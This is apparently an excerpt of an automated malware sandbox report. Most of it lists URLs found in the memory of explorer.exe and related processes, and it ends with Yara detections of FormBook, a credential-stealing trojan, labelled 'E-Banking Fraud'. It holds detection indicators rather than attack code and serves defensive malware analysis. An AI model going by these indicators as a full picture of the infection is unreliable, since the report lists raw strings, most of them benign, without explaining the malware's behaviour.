Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2196291605.0000000004B50000.00000002.00000001.sdmp, String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000008.00000000.2195388777.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000008.00000000.2195388777.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: vbc.exe, 00000004.00000003.2189382975.0000000004C60000.00000004.00000001.sdmpString found in binary or memory: http://ns.a
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: vbc.exe, 00000004.00000002.2195649466.00000000064A0000.00000002.00000001.sdmp, RegAsm.exe, 00000006.00000002.2219630675.0000000002120000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2189359116.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000008.00000000.2198730467.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2196291605.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000008.00000000.2196291605.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: vbc.exe, 00000004.00000002.2195649466.00000000064A0000.00000002.00000001.sdmp, RegAsm.exe, 00000006.00000002.2219630675.0000000002120000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2189359116.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2196291605.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match File source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPE
